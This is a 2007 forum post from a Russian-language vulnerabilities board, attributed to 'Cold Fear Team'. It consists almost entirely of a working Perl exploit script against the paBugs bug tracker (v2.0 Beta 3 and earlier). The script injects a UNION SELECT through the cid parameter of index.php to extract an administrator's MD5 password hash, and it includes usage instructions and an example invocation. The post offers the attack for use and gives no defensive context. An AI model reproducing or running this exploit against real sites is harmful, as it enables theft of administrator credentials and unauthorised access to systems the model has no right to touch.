paBugs <= v2.0 Beta 3 Sql-Injection exploit

Discussion in 'Уязвимости' started by p-range, 10 Jan 2007.

  1. p-range

    p-range Elder - Старейшина

    Joined:
    5 Feb 2006
    Messages:
    137
    Likes Received:
    145
    Reputations:
    118
    Code:
    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    if(@ARGV < 4)
    {
    	usage();
    	exit();
    }
    
    $host = $ARGV[0]; # Host
    $path = $ARGV[1]; # Path to paBugs directory
    $pref = $ARGV[2]; # prefix for table admins
    $usid = $ARGV[3]; # user id
    
    $www = new LWP::UserAgent;
    $sql = "$host$path\index.php?cid=1'+union+select+1,2,3,password,5+from+$pref\_admins+where+id=$usid/*";
    print "\n\n [~] Searching password hash for user with id=$usid \n";
    $res = $www -> get($sql) or err();
    $res -> content() =~ /([0-9,a-f]{32})/ or err();
    print "\n [+] MD5 Hash for user with id=$usid is: $1 \n\n";
    
    sub usage()
    {
    print "+---------------------------------------------------------+\n";
    print "|                  .: Cold Fear Team :.                   |\n";
    print "+---------------------------------------------------------+\n";
    print "|    paBugs <= v2.0 Beta 3 Sql-Injection exploit          |\n";
    print "| Usage: pabugs_cft.pl <site> <folder> <prefix> <user_id> |\n";
    print "| e.g.: pabugs_cft.pl http://site.com / bt 1              |\n";
    print "| Coded by p-range   // cf-team.net   // p-range.info     |\n";
    print "+---------------------------------------------------------+\n";
    }
    
    sub err()
    {
    print "\n [-] Engine is NOT vulnerably";
    exit();
    }
     
    #1 p-range, 10 Jan 2007
    Last edited: 11 Jan 2007
    3 people like this.